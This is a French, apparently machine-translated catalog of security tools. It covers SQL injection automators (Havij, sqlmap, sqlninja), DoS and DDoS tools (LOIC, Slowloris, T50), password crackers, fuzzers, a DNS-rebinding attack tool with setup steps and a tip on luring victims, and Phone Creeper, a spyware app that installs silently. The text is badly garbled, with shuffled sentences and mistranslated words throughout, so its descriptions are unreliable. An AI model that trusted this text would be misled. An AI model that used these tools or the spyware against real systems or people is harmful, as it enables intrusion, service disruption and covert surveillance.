Compatibilité totale avec tous les hôtes Exploitation des Systèmes sur lesquels les bases de données pris en charge peuvent exécuter.* Contient déjà compilés par les exécutables d'exploits célèbres et efficaces alongwith quel ques exploits d'origine. sans nécessiter de modificatio ns à apporter à ces demandes. .net/ ExploitMyUnion est un outil écrit en Python avec une interface utilisateur PyQt fa . . . la création de données. ExploitMyUnion http://exploitmyunion. VMS.DB Audit Expert permet aux adm inistrateurs de bases de données et système. Ce qui rend DB Audit vraiment unique est sa prise en charge intégrée de plusieurs méthodes d'audit qui vous donne la possibilité de choisir la meill eure solution pour vos besoins de sécurité de base de données. aux auditeurs et aux opérateurs de suivre et d'analyser toute activité de base de données y compris la sécurité de base de données.htm DB Audit Expert est une solution professionnelle de base de données d'audit pour O racle.com/dbaudit/download.Libère DBA de la nécessité de créer et gérer des bases de données finement réglé déclenche ins de vérification des données de changement. l'accès et l'utilisation. . . .Fournit un système totalement transparent au niveau des données et la vérification d u changement de toutes les applications existantes.TXT) * PortScan est multi-thread. permettant au personn el de sécurité de choisir des types spécifiques d'opérations de base de données et les mod ifications de données qui doivent être contrôlées et enregistrées dans la piste d'audit.Fournit des détails sur piste de vérification qui ne sont pas disponibles à partir u tilitaires natifs d'audit de base de données.Prend en charge l'audit des configurations de flexibilité. . qui réduit la courbe d'app rentissage et est facile à utiliser.Caractéristiques de contrôle d'audit centralisé des systèmes de base de données multiple s à partir d'un emplacement unique de facilité de gestion.softtreetech. . Captures à la fois u n accès régulier et «porte arrière» pour les systèmes de base de données vérifiées. Linux. * Scanne tous les ports 1 -* 65535 après avoir pris l'adresse IP et tente tous les exploits possibles en fonction de la liste des ports ouverts découvert (OpenPorts . * Pas besoin de déboguer un script ou de compiler le code source. Sybase.Améliore la sécurité du système et assure la transparence du système.Offre la possibilité de générer des alertes e-mail en temps réel au personnel clé lorsqu e surviennent des changements à des données sensibles. modificat ion ou suppression.Fonctionnalités de l'interface graphique unifiée d'audit. y compris mais non limité à Windows NT . DB2. le cas échéant) Base de données DB Audit http://www. aux administrateurs sécurité. z / OS. UNIX. MySQL et Microsoft SQL Server.sourceforge. OS/390. Caractéristiques: . * Ne nécessite pas de base de données à l'arrière-end comme les autres * Peut également être utilisé pour tester l'efficacité de l'IDS / IPS * Lancé exploits sont indépendants et ne s'appuie pas sur les empreintes de service (pour éviter l'évasion. . .Fournit des rapports analytiques qui permettent de réduire de grandes quantités de données d'audit à des résumés complets permettant ainsi d'identifier facilement les div erses atteintes à la sécurité de base de données.Fournit des rapports d'analyse qui aident à identifier les processus et les util isateurs sont monopolisant les ressources du système.

Bases de données supportées par des méthodes d'injection: MsSQL 2000/2005 avec l'erreur MsSQL 2000/2005 aucune erreur (union fondée) MySQL (base caisse) MySQL aveugles Erreur MySQL base Oracle (base caisse) MsAccess (union fondée) 2. l'exécution des instructions SQ L et même l'accès au système de fichiers sous-jacents et exécuter des commandes sur le s ystème d'exploitation.. 3. 7. Caractéristiques: 1. 1. détection automatique des mots clés (différence entre trouver la réponse positive et négative) 5. détection automatique de type (chaîne ou un entier) 4. Havij http://www. Options pour remplacer l'espace par /**/.. Il peut profiter d'une application web vulnérable.com/en/projects/project1.cqure. même des utilisateurs amateur s. 6. Évitez d'utiliser des cordes (magic_quotes similaires contourner les filtres) 10 Suspension de l'union illégale 11 Complet en-têtes HTTP variés (comme referer et agent utilisateur) 12 cookie Charger à partir du site pour l'authentification 13 tables de deviner et de colonnes de MySQL 5 <(également à l'aveugle) et MsAccess 14 Fast obtenir des tableaux et des colonnes pour mysql 15 Discussion multi page de recherche d'Admin 16 Discussion multi Online MD5 pirate 17 Mise Informations SGBD 18 Mise en tables..htm Havij est un outil automatisé d'injection SQL qui permet aux testeurs de pénétration d e trouver et d'exploiter les vulnérabilités d'injection SQL dans une page web. des colonnes et des données 19 executation Command (mssql seulement) 20 fichiers système de lecture (mysql uniquement) 21 INSERT / UPDATE / supprimer des données OScanner http://www. Support de proxy 7. Il a une architecture à bas . La puissance de Havij qui le rend différent des autres outils similaires est de se s méthodes d'injection.net/wp/oscanner/ Oscanner est un cadre d'évaluation Oracle développé en Java. détection automatique des bases 3.itsecteam. 2. Essayer syntaxes d'injection différents 6. l'extraction de données à partir de la base de données. de récupérer les utilisateurs de SGBD et les mots de passe. tables de vidage et de colonnes. Le taux de réussite est supérieur à 95% à injectiong cibles vulnérab les en utilisant Havij. il est facile à utiliser pour tous. résultat en temps réel 8. Le convivial GUI (Graphical User Interface) de Havij et les paramètres automatique s et des détections. contre les IDS ou les filtres 9. 4. 5.it pour automatiser l'exploitation par injection SQL.+. En utilisant ce logiciel l'util isateur peut effectuer des empreintes digitales base de données back-end.

devine z chemin web. est l'abréviation de SQL Injector et sur chenilles.com/papers/sfx-sqli-en. SFX-SQLI http://www. la commande exécuter. NTLM et authentification de ce rtificats * Support complet de MySQL.com/2010/03/22/toolza-sql-injection-tool-options/ . Sqlit e * Prise en charge complète de l'erreur / Union / Blind injection / Force SQL * Support pour accès du fichier. en coordination avec le CS EM. inverse de domaine IP. Cette technique est basée sur la clause FOR XML.net/projects/safe3si/ Safe3 SQL Injector est un des outils de tests de pénétration le plus puissant qui au tomatise le processus de détection et d'exploiter des failles d'injection SQL et p rise en charge des serveurs de base de données back-end. DB2.kachakil. ACESS. Scrawlr est ultra-rapide et utilise notre technolog ie intelligente du moteur de façon dynamique artisanale attaques par injection SQL à la volée. Oracle. etc * Dérivation Super WAF Scrawlr https: / / h30406.php Scrawlr.htm SFX-SQLI (Sélectionnez Pour XML SQL injection) est une technique d'injection SQL n ouvelle qui permet d'extraire toute l'information d'un Microsoft SQL Server 2005 /2008 base de données d'une manière extrêmement rapide et efficace. Scrawlr vont parcourir un site web tout en analysant les paramètres de chaque page Web individuelle pour les vulnérabilités d'injection SQL.e de plugins et est livré avec un couple de plugins qui n'ont actuellement: Dénombrement Sid Tests mots de passe (commune et dictionnaire) Énumérer Oracle version Des rôles de comptes énumérer Énumérer les privilèges de compte Compte énumérer hachages Énumérer les informations d'audit Les politiques de mot de passe énumérer Les liens de base énumérer Les résultats sont donnés dans un arbre java graphique.com/campaigns/2008/wwcampaign/1-57C4K/index. Safe3 Injecteur SQL http://sourceforge.www3. PostgreSQL. développé par le HP Web Security Research Group. md5 crack. eci est une liste des fonctions disponibles: * Support complet pour GET / Post / Cookie injection * Prise en charge complète de HTTP de base. qui est capable de convertir le c ontenu d'un tableau en une chaîne unique. MSSQL. Digest.hp. de sorte que son contenu pourrait être ajo uté à un domaine injection d'une sous-requête dans une entrée vulnérables d'une applicatio n web. Il peut même fournir la preuve des résultats positifs en affichant le type de base de données principale en cours d'utilisation et une liste de noms de table s disponibles. Sybase. Toolza http://pentestit.

Possibilité de sélectionner le protocole HTTP (0 .1.1) bsqlbf http://code.VALIDATE_REMOTE_RC exploiter Type 7: OS est l'exécution de code SYS.Proxy Grabber Post/Get/Proxy/SOCKS4-5/Cookies/Timeout/Multithread/HTTPS + autorisation pris en charge .KUPP $ PROC.Toolza . Oracle L'outil prend en charge 8 modes d'attaque (de type interrupteur): Type 0: Injection SQL aveugles en fonction des conditions vrai et le faux renvoyée s par le serveur back-end Type 1: Injection SQL Blind fondée sur l'erreur et vrai (par exemple. Il accept e des requêtes SQL en tant que paramètre de ligne de commande et il fonctionne à la fo is entier et chaîne basée injections. 1 . Bases de données supportées: 0.Possibilité de changer l'agent utilisateur .google.Site de numérisation des dossiers et fichiers .Sélectionnez une connexion timeout .SQL Injection outil avec de nombreuses options Caractéristiques de toolza: . sans autorisation. auto-détection chausset tes type (4-5).HTTP/1.txt) .com/p/bsqlbf-v2/ Ce script perl permet d'extraire des données de Injections SQL aveugles.Possibilité de changer le référent .LFI / Reader / Loade_file () Bruter . en collaboration avec le premier jour ouvrabl e . Type 3: extraction de données avec les privilèges SYS (dbms_export_extension ORACLE exploiter) Type 4: l'exécution de code OS (dbms_export_extension ORACLE exploiter) Type 5: est la lecture de fichiers (dbms_export_extension ORACLE exploit.Sélectionnez POST ou GET . MS-SQL 1.Capacité à insérer les cookies . par défau t . MySQL 2. PostgreSQL 3. Type 2: Injection SQL aveugles "ordre" et de "group by".FTP checker .Proxy Checker .Support pour le proxy (fichier proxy. en collaboration avec le premier jour ouvrable .FTP Bruter .HTTP/1.CREATE_MASTER_PROCESS ().txt) . basé sur Java) Type 6: OS est l'exécution de code DBMS_REPCAT_RPC.avtocheking. erreur de sy ntaxe) renvoyées par le serveur back-end.0.avtocheking.Support pour SOCKS4-5 (fichier socks. DBA p .

privilèges. sqlninja http://sqlninja. exécu tez generator.Elle doit être utilisée par les testeurs de pénétration d'aider et d'au tomatiser le processus de prise en charge d'un serveur de DB quand une faille d' injection SQL a été découvert. diriger sa propre instruction S QL. vidage utilisate ur spécifié entier ou les tables du SGBD / colonnes. exécu tez generator. la disponibilité xp_cmdshell. sqlmap http://sqlmap. bases de données . Caractéristiques D'empreintes digitales * du serveur distant SQL (version. afin de trouver un port qui est autorisé par le pare-feu du réseau cible et l'utiliser pour une coque arrière * Bindshell directe et inverse. multi-plate-forme PHP script pour automatiser site pentest pour SQL Injection vulnérabilités. d'e xécuter des commandes arbitraires sur le système d'exploitation. l'utilisateur effectua nt les requêtes. même dans un environn ement très hostile. avec des autorisations d' E / S JAVA Cmd-revshell = Type 8 prend en charge l'exécution de charge utile Meterpreter.net/ qlninja est un outil d'exploiter les vulnérabilités d'injection SQL sur une applicat ion web qui utilise Microsoft SQL Server comme back-end. à la fois TCP et UDP * DNS-tunnel pseudo-shell.FUNCALL OS exécution de code.exe premier hexjector http://sourceforge. base de données d'exploitation enregistrées débordement de t ampon ou de procédure attaque de relais SMB et plus. l'utilisateur peut choisir parmi une variété d'options p our effectuer une vaste base de données back-end de gestion des empreintes digital es du système.exe premier Type 8: est DBMS_JAVA_TEST.sourceforge. lire ou écrire du texte ou des fichiers binaires sur le système de fichiers. récupérer des SGBD utilisateur de la session et la base de données.sourceforge. les mots de passe. Son principal objectif est de fournir un accès interactif sur le serveur vulnérable DB. établir un out-of-ban d connexion "stateful" entre l'agresseur boîte et le serveur de base de données via stager charge Metasploit.rivs Cmd = revshell-Type 7 prend en charge l'exécution de charge utile Meterpreter. en l'absence de ports TCP / UDP sont disponibles pour . les privilèges des utilisateurs. les u tilisateurs énumérer.net/ sqlmap est un logiciel libre de ligne de commande automatique de l'outil d'injec tion SQL. Son objectif est de détecter et de tirer parti des vulnérabilités d'injectio n SQL dans les applications web. Une fois qu'il détecte une ou plusieurs injection s SQL sur la machine cible. mode d 'authentification DB) 'Sa' force brute * du mot de passe (en 2 versions: un dictionnaire et incrémentale s) * Elévation de privilèges au groupe sysadmin si le mot de passe 'sa' a été trouvé * Création d'un xp_cmdshell personnalisé si l'original a été supprimé * Upload de netcat (ou tout autre exécutable) en utilisant uniquement les requêtes H TTP normales (pas de FTP / TFTP nécessaire) * TCP / UDP scan de la cible SQL Server à la machine d'attaque.net/projects/hexjector/ Hexjector est un Opensource.

Le programme ne se présente pas au titre des programmes installés ou les programmes en cours et permet un large utiles ou de fonctionnalités.net/ OAT est une solution Open Source de sécurité outil conçu pour vérifier la force du mot d e passe d'utilisateurs de Microsoft Office Communication Server. Après un mot de p asse est compromise. bien sûr. Toutes les commandes seront automatiqueme nt reçus et supprimés immédiatement et les résultats seront publiés à l'expéditeur. les objecti fs de fuzz. Téléphones exécution de ce log iciel peut être commandé à distance par SMS.un direct / shell inverse. FireCat n'est pas un replacement des utilitaires de sécur . brute noms d'utilisateur et mots de passe vigueur et. mais le serveur peut résoudre les noms d'hôtes DB extern es * Techniques d'évasion pour confondre un peu IDS / IPS / FAT * Intégration avec Metasploit3.sourceforge. ce programme en mode silencieux se réinstaller.com/ Le premier réseau de distribution d'audit pour le téléphone portable sorti. des ex ploits.com/showthread. Pré-configuré les paramètres peuvent être ajoutés à l'installateur d'avoir votre mot de pass e par défaut et votre numéro de téléphone pour recevoir des mises à jour en direct. " Polyvalent FireCat http://sourceforge. même après une réinitialisation matéri elle.com/p/inguma/ Ngouma est un outil de test de pénétration entièrement écrit en python. NeoPwn http://www. si la carte mémoire avec ces fichiers est encore dans le dispositif.xda-developers. recueillir des informations sur. Inguma est encore très développée donc n'oubliez pas de rester à jour et vérifier à nouveau pour d e nouvelles et mises à jour. OAT démontre le potentiel des attaques UC qui peuvent être effe ctuées par des utilisateurs légitimes si les contrôles de sécurité appropriées ne sont pas e n place. Bien que les capacités d'exploitation actuels dans Inguma peut être limitée. Le NeoPwn Mobile Pentesting projet est fière d'annoncer qu'elle fusionne avec Back Track. pour produire le tout premier BackTrack Mobile suite! Téléphone Creeper http://forum. Mobile (OAT) OCS Outil d'évaluation http://voat. il peut être installé silencieuse ment en insérant une carte SD avec les fichiers ci-dessous à ce sujet.php?t=527423 Téléphone Creeper est une suite d'espionnage téléphonique. ce progra mme offre de nombreux outils de collecte d'informations et d'audit cible.net/projects/firecatpackage/ FireCat (Catalogue de l'extension Firefox de vérification) est une collection mind map des extensions firefox le plus efficace et utile d'audit de sécurité axée sur l'ap plication et l'évaluation. Le cadre compren d des modules pour découvrir les hôtes.google. pour obtenir un accès graphique sur le serveur dista nt par le biais d'une injection DB serveur VNC Inguma http://code.neopwn. Par défa ut.

Il fourni t les classes pour la création interactive de paquets ou des ensembles de paquets.php SpiderLabs a développé des dizaines d'outils au fil des ans. de les envoyer sur le fil. tethe real. hping. Il supporte le protocole TC P. en utilisant des protocoles différents. Rapport modules s ont possibles et faciles à faire. a un mode de traceroute. tcpdump.trustwave. Un sous-ensemble des choses que vous pouvez faire en utilisant hping: * Les épreuves de pare-feu * Port avancé de numérisation * Pour tester un réseau. Bien que hping a été principalement utilisé comme un outil de sécurité dans le passé. n map. hping http://www. UDP. mais hping est non seulement capable d'envoyer des demandes d'écho ICMP. PeachFuzzer http://peachfuzzer.org/projects/scapy/ Scapy est un puissant outil interactif de manipulation de paquets. l'exploitation forestière interface. p0f. La plupart d'entre eux finissent comme des outils internes que depuis ils ont fini par faire leur chemi n dans l'une des offres de produits de Trustwave. arp-sk. sniff autres paquets de fil. queso.secdev. faire correspondre les réponses et les réponses. de les manipuler. L'interface est inspirée à la commande ping (8) commande unix. ICMP et IP-RAW. et les relations dans les données à fuzzed. Il permet en outre de la configuration d'une course fuzzing. et renifleur de paquets.com / SpiderLabs-tools. la capacité d'envoyer des fichier s entre un canal couvert. scanner réseau.ité et d'autres logiciels. et de nombreuses autres fonctionnalités. outil de découverte du réseau. les mandataires et les vulnérabilités de s applications scanners. Il est destiné à faire les mêmes choses que ttlscan. y compris la sélection d'un transport de d onnées (Editeur). la fragmentati on * Manuel découverte MTU du chemin * Advanced traceroute. arping. TOS. ainsi que fuzzers. des inf ormations de type. irpas. il peu t être utilisé de plusieurs façons par des gens qui ne se soucient pas de sécurité pour te ster les réseaux et les hôtes.org/ hping est une ligne de commande orientée TCP / assembleur de paquets IP / analyseu r. donc les structures de programmation Python peuvent être utilisés (tels que les variables.com/PeachQuickstart Scapy https: / / www.com/ Peach est une SmartFuzzer qui est capable de réaliser la production et le fuzzing mutation base.L'interaction est fourni par l'interpréteur Python. xprobe. et plus encore. Peach nécessite la création de fichiers Peachpit qui définissent la structure. générateur de paq uet. arpspoof. sous tous les protocoles pris en charge * Distance OS fingerprinting disponibilité à distance * deviner * TCP / IP de vérification des piles . Firewalk. etc http://peachfuzzer. etc SpiderLab Outils https: / / www.hping. les boucles et les fonctions).

hping * peut aussi être utile aux étudiants qui apprennent le protocole TCP / IP. pentbox http://www.pentbox.net/ PenTBox est une suite de sécurité qui emballe beaucoup de sécurité et la stabilité des tes ts des programmes axés sur des réseaux et des systèmes. Par exemple, la suite a Honeypot, TCP Flood Déni de Service outils de test, Secure Instant Messaging, Port Scanner, Fuzzer, mots de passe sécurisé générateur et plus. Tous les programmes sont en cours d'élaboration par PenTBox équipe et les contribute urs de la communauté du logiciel libre au projet. Programmé en Ruby, et orientée vers les systèmes GNU / Linux (mais compatible avec Win dows, MacOS et plus). Il est libre, sous licence GNU/GPLv3. Réseau 6tunnel http://toxygen.net/6tunnel/ 6tunnel vous permet d'utiliser les services fournis par les hôtes IPv6 avec des ap plications IPv4 et vice-versa. Il peut se lier à n'importe lequel de vos IPv4 (par défaut) ou des adresses IPv6 et de transmettre toutes les données pour IPv4 ou IPv6 (par défaut) d'accueil. DDOSIM http://sourceforge.net/projects/ddosim/ Couche application DDoS Simulator ddosim est un outil qui peut être utilisé dans un environnement de laboratoire pour simuler un déni de service distribué (DDOS) contre un serveur cible. Le test montre la capacité du serveur pour gérer les applications spécifiques des attaques DDOS. ddos im simule plusieurs hôtes zombie (ayant des adresses IP aléatoires) qui créent plein l es connexions TCP vers le serveur cible. Après avoir terminé la connexion, ddosim co mmence la conversation avec l'application d'écoute (par exemple, le serveur HTTP). ddosim est écrit en C + + et fonctionne sur Linux. Ses fonctionnalités actuelles com prennent: * DDoS HTTP avec des demandes valides * DDoS HTTP de requêtes non valides (semblable à un DC + + attaque) * SMTP DDoS inondations * connexion TCP sur le port aléatoire Echo Mirage http://www.bindshell.net/tools/echomirage Echo Mirage est un proxy réseau générique. Il utilise l'injection de DLL et techniques des fonctions d'accrochage pour rediriger les appels de fonction réseau connexes afin que les données transmises et reçues par des applications locales peuvent être ob servées et modifiés. fonctions de chiffrement Windows et OpenSSL sont également accrochés de telle sorte que le texte brut de données envoyées et reçues au cours d'une session cryptée est égaleme nt disponible. Le trafic peut être intercepté en temps réel, ou manipulés avec des expressions régulières e t des scripts d'action

Cannon ions de basse orbite http://sourceforge.net/projects/loic/ Orbite basse Ion Cannon (Loïc) est un programme open source écrit en McDonald's Visu al C # environnement de codage. Il est utilisé pour DDoSing sites Web et les tests de sécurité du serveur. LOIC (orbite basse Ion Cannon) est une application de test de réseau stress, écrit e n C # et développé par "praetox". Il tente une attaque par déni de service sur le site cible par les inondations le serveur avec des paquets TCP, les paquets UDP, ou des demandes HTTP avec l'intention de perturber le service d'un hôte particulier. Le programme a été exploitée au cours du projet Chanology à attaquer des sites Web de Sc ientologie, et est actuellement utilisé par l'opération Avenge Assange (organisée par l'opération de récupération) pour attaquer les sites Internet des entreprises et des o rganisations qui se sont opposés à Wikileaks http://insurgen.info/wiki/Low_Orbit_Ion_Cannon http://www.partyvan.info/wiki/Low_Orbit_Ion_Cannon Mausezahn http://www.perihel.at/sec/mz/ Mausezahn est un générateur de trafic rapide gratuit écrit en C qui vous permet d'envo yer presque tous les paquets possibles et impossibles. Il est principalement uti lisé pour tester les réseaux VoIP ou multicast, mais aussi pour des audits de sécurité p our vérifier si vos systèmes sont durcies suffisant pour des attaques spécifiques. Mausezahn peut être utilisé par exemple: * Comme générateur de trafic (par exemple, à souligner les réseaux multicast) * Pour mesurer précisément la gigue (variations de retard) entre deux hôtes (par exemp le la vérification VoIP-SLA) * Comme outil didactique lors d'une conférence de transmission de données ou pour ex ercices pratiques * Pour les tests de pénétration de firewalls et les IDS * Pour les attaques DoS sur les réseaux (aux fins de vérification bien sûr) * Pour trouver des bogues dans le logiciel de réseau ou les appareils * Pour les attaques de reconnaissance l'aide de balayages ping et les scans de p orts * Pour tester le comportement du réseau dans des circonstances étranges (stress test , paquets malformés, ...) ... Et plus encore. Mausezahn est fondamentalement un outil polyvalent paquet créa tion sur la ligne de commande avec une syntaxe simple et une aide contextuelle. Il pourrait également être utilisé dans (bash-) des scripts pour effectuer une combina ison de tests. Soit dit en passant, Mausezahn est assez rapide, quand a commencé s ur mon vieux PIII-portable (1,4 GHz, Gigabit Ethernet), j'ai mesuré 755 Mbit / s e n utilisant les compteurs de paquets d'une interface HP ProCurve 5400 commutateu r. Naptha http://netexpect.org/wiki/Naptha TCP État Epuisement d'essai Avec Network Attendez - Les vulnérabilités Naptha sont un type de vulnérabilités de déni de service et documentés par Bob Keyes, de l'équipe BindVie w rasoir de sécurité en 2000. Les vulnérabilités existent dans certaines implémentations d u protocole TCP, en particulier dans la façon dont certaines implémentations TCP gar der une trace de l'état des connexions TCP, et permettre à un attaquant d'épuiser les ressources d'un système attaqué sans utiliser beaucoup de ressources sur le système ut ilisé pour lancer l'attaque.

OpenDPI http://code.google.com/p/opendpi/ Le moteur OpenDPI, publié sous la licence LGPL, diffère de commerciaux ipoque de mot eur d'analyse dans son matériel DPI à prix élevé. La version open-source est beaucoup pl us lent et (plus important) ne révèle pas de méthodes pour identifier ipoque transmiss ions cryptées. DPI vendeurs prétendent tous niveaux élevés de succès à identifier ce trafic sur la base des modèles d'écoulement et les signatures poignée de main à des protocoles communs tels que BitTorrent et Skype, même si elles ne peuvent pas casser le crypt age et d'examiner le contenu de ces transmissions. Pylore http://motomastyle.com/pyloris/ Pylore est un outil pour tester la vulnérabilité d'un serveur Web à une classe particu lière de déni de service (DoS). Il utilise la méthode Slowloris; en utilisant toutes l es connexions disponibles, les serveurs Web ne peut pas traiter les demandes val ables. Pylore est un outil de script pour tester la vulnérabilité d'un serveur Web à un déni de service (DoS) qui supporte SOCKS, SSL, et toutes les méthodes de requête HTTP. Il u tilise la méthode Slowloris. QuickRecon http://code.google.com/p/quickrecon/ QuickRecon est un outil d'information simple rassemblement qui vous permet de: * Sous-domaines Bruteforce d'un domaine cible * Effectuer le transfert de zone * Les adresses email Recueillir de Google.com et Bing.com * Trouver les relations humaines en utilisant XHTML Friends Network (microformat s) RawCap http://www.netresec.com/?page=RawCap RawCap est un renifleur de commande en ligne gratuit de réseau pour Windows qui ut ilise des sockets bruts. Propriétés de RawCap: Peut sniff toute interface qui a obtenu une adresse IP, y compris 127.0.0.1 (loc alhost / loopback) RawCap.exe est à seulement 17 kB Aucune bibliothèque externe ou DLL nécessaires autres que. NET Framework 2.0 Aucune installation n'est nécessaire, il suffit de télécharger et RawCap.exe sniff Peut sniff la plupart des types d'interface, y compris les interfaces WiFi et PP P le minimum de mémoire et de la charge CPU Fiable et simple d'utilisation Utilisation Vous devez disposer de privilèges d'administrateur pour exécuter RawCap. Relier http://code.google.com/p/rebind/ Relier est un outil de DNS reconsolidation, qui implémente les multiples attaques

il est difficile de trouver ces paramètres. il pourrait fonctionner sur BSD. de sorte que vous pourriez avoir à chercher un peu. Cela se fait en deux étapes: d'abord. alors vous devez configurer votre domaine pour utiliser ce serveur de no m. Seuls les pré-requis est que. netcat manqua it certaines fonctionnalités.com. Il a toutes les images filtrées. Si par exemple votre domaine est "mydomain. nom d'hôte. Il vous permet un accès interne d'un routeur cible interface Web! La meilleure partie est l'administration à distance n'a pas besoin d'être activé pour que cette attaque fonctionne! Tout ce qui est nécessaire est que l 'utilisateur à l'intérieur du réseau cible surfer sur un site Web qui est contrôlée. par vous. Il t ravaillera également sur les systèmes d'exploitation 64-bit. vous entrez dans ns1. bien que certains ne sont pas et de nombreux. C'est désormais chose faite. etc. vous devez vous enregis trer la machine que vous avez l'intention d'exécuter des Rebind comme un serveur d e noms.com". etc) et le premier enregistrement de deux serveurs de noms. Vous pouvez éventuellement utiliser des astuces d'ingénierie s ociale pour inciter un utilisateur à visiter ce site web. ou a été compromise. Une fois que vous avez enregistré votre nom de serveur. le modèle. " Relier a été spécialement programmé pour fonctionner uniquement avec les systèmes d'exploi tation Linux. deux serveurs Web et un serve ur proxy HTTP dans un seul binaire Linux. TCP et UDP mandatement et IPv4/IPv6 fonction nalités de proxy. ce qui pe rmettra Rebind à accepter et à traiter toutes les demandes DNS pour votre domaine. Nom du serveur de noms ns1 et ns2 et définir leurs adresses IP à celle de la machine d'où vous avez l'intention d'exécuter Rebind. Il ne nécessite aucune con naissance préalable du routeur cible ou les paramètres de configuration du routeur c omme marque. Vous souhaitez vous inscrire deux parce que la plupart des bureaux d'enregistrement aura besoin de votre domaine d'avoir au moins deux serveurs de noms. Ainsi. et ne pas utiliser un anti-DN S pinning techniques. allez faire vos paramètres D NS de domaine et de définir ces serveurs de noms que les serveurs de noms faisant autorité pour votre domaine. nous sont demandés à ce sujet!) SSL NetCat Capable http://gomor. mais pas sur Windows. profitez. Par exemple. l'adresse IP. Dans les mots des auteurs "En fait. le support de SSL. Yahoo.com et ns2. Relier intègre un serveur DNS. (En fait. et vous devez avoir installé iptables et lis tés dans $ PATH. Considérant que nous avons une autre année pour IPv6 d'être populaire. . nous pourr ions tout aussi bien jouer avec elle pour l'instant! Rappelez-vous! Vous devez avoir le http://your-domain-name/init visite de l'util isateur final et non pas seulement http://your-domain-name/. DNS reliaison Maintenant. comment l'utiliser e t qu'il aurait dû être intégrée dans tous les systèmes UNIX il ya longtemps. vous devez configurer votre nom de domaine à utiliser Rebind que votre s erveur DNS primaire. Aller à la registraire. tout le trafic DN S seront dirigés vers la machine où vous avez l'intention d'exécuter Rebind.La plupart des bureaux d'enregistrement vous permettra d'effectuer ces deux ac tions. Maintenant. Il ne fonctionnera pas avec IPv6 s oit.mydomain. à moins que j'ai raté un bug. et j'ai essayé de les ajouter dans cette version de Pe rl. GoDaddy.mydomain."A" DNS record reconsolidation. Maintenant. et que vous voulez relier à traiter toutes les requêtes DNS. comment voulez-vous le faire fonctionner. où vous avez enregistré votre nom de domaine (Host-Unlimited. il doit être exécuté en tant que root.org/bin/view/GomorOrg/SslNetcat Vous savez tous ce qui est netcat (écrit par Hobbit en 1996).

S'il vous plaît note pour obtenir un accès complet à tous les outils disponibles vous avez besoin de développer des outils IPV6 vous-même ou proposer des correctifs. 4.aspx ShareScan est un utilitaire gratuit qui permet au personnel informatique de sécuri té pour identifier ouvrir des partages de fichiers Windows disponibles sur le réseau interne. Il est un puissant et un outil paquet unique in jection. * Simulation d'attaques par déni de service-. Plus de 1. programmé en C? THC-IPV6 http://freeworld.000 de pourcentage du SYN Flood (+60% de la liaison montante du réseau) dans un réseau 1000BASE-T (Gigabit Ethernet).des vulnérabilités potentie lles qui devraient être assainis.000 pps de SYN Flood (+60% de la liaison montante du réseau) dans u n réseau 100BASE-TX (Fast Ethernet). les périphériq ues réseau et de solutions de sécurité en place. Plus de 120.ShareScan http://www. 2.org/slowloris/ DoS HTTP Slowloris T50 Sukhoi PAK FA http://www. 3.html T50 Sukhoi PAK FA mixte Packet injecteur (alias F22 Raptor) est un outil conçu pou r effectuer des tests de stress.com/dir/wlw1Gawh/NB_Research_Labs.-à-peu près. la bibliothèque Winsock utilise pour créer des sockets UDP et l'inondation d'une cible. ce qui en fait un «se cond to none" outil: 1. et comprend un facile d'employer la bibliothèque de l'usine de paquets. qui est capable de: * Envoyez séquentielle (c. 2. Cet outil peut aider les administrateurs à identifier les systèmes qui ont de larges autorisations ouvert ou aucune autorisation .000. * Effectuer des "stress tests" sur une variété d'infrastructures de réseau.net/projects/udpunicorn/ Une inondation Win32 UDP / DoS (Denial of Service) d'utilité avec le multithreadin g.org/thc-ipv6/ Un jeu d'outils complet pour attaquer les faiblesses inhérentes du protocole IPV6 et ICMP6. UDP Unicorn http://sourceforge.mcafee. ICMP .4shared.ckers.thc. sur le même temps) les protocoles suivants: 1.com/us/downloads/free-tools/sharescan.il suffit de télécharger et de voir par vous -même la puissance de cet outil. Pour les tests de sécurité réseau.Transmission Control Protocol UDP . Oh! Avons-nous oublié de vous dire que c'est un out il open source. . des outils et des commentaires au THC-ipv6 projet. la validation des règles de pare-feu e t Intrusion Detection System / Intrusion Prevention System politiques.Protocole de gestion de groupe Internet TCP .User Datagram Protocol * Envoyer un montant (très) incroyable de paquets par seconde. Wont dire beaucoup de choses à ce sujet . Slowloris http://ha.Internet Control Message Protocol IGMP .

PCNFS. Pour HotFu zz comprendre les protocoles existants.net/ Yersinia est un outil de réseau conçu pour tirer parti de certaines weakeness dans l es protocoles réseau différents. .thc. il est souple et très rapide. SMTP-AUTH. MYSQL. Il me t en œuvre une fonctionnalité de proxy entre les applications réseau. REXEC. comme le montre le mot de passe toutes les études de sécurité. qu'il prend les quatre étapes suivantes po ur fuzz d'une application * * * * Configuration des applications et la partie proxy HotFuzz Enregistrement Configuration du processus de fuzzing Fuzzing hydre http://freeworld. Les nouveaux modules sont faciles à ajouter. Rsh. IMAP. Actuellement cet outil prend en charge: TELNET. C'est là que HotFuzz est très pratique car il nécessite très peu de connaissances sur l'application. SMB. rlogin. Enfait il est si facile.com/ HotFuzzThe HotFuzz projet vise à fournir un outil pour découvrir les failles de sécuri té dans les applications réseau. En opérant comme un proxy réseau entre l'application client et le serveur et effectue en temps réel l'analyse des d onnées et de fuzzing. POP3. Peut être très difficile pour les utilisateurs inexpérimentés . SOCKS5. Hydra est un pirate connexion parallized qui supporte de nombreux protocoles d'a ttaquer.1Q IEEE 802.1X Protocole Inter-Switch Link (ISL) VLAN Trunking Protocol (VTP) hotfuzz http://hotfuzz. mais d'autres sont à venir (nous dire lequel est votre préféré). SMBNT. nous pouvons sans risque dire que HotFuzz est également capable de la même chose. Création d'un fichier fosse. VNC. il existe certains protocoles réseau mis en œuvre. FTP.atteq. MS-SQL. HTTPS. HTTP-PROXY. Actuellement. Nous savons tous que Peach est capable d'effectuer deux muta tion fuzzing base et la production de base. Il prétend être un cadre solide pour analyser et tester les réseaux et les systèmes déployés.Yersinia http://www. dissecteurs Wireshark sont utilisés. SNMP.yersinia.org/thc-hydra/ Un biscuit salé du réseau très rapide d'ouverture de session qui supporter de nombreux services Numéro un des trous de sécurité sont plus des mots de passe. A la base est le cadre de fuzzing Peach. HTTP. Il modifie les d onnées avant de les transmettre au programme fuzzed. CVS. Ainsi. à côté de cela. NNTP. Les attaques pour les protocoles réseau suiv ants sont mis en œuvre (mais bien sûr vous êtes libre de mise en œuvre de nouvelles): * * * * * * * * * Protocole Spanning Tree (STP) Cisco Discovery Protocol (CDP) Protocole Trunking dynamique (DTC) Dynamic Host Configuration Protocol (DHCP) Hot Standby Router Protocol (HSRP) IEEE 802.

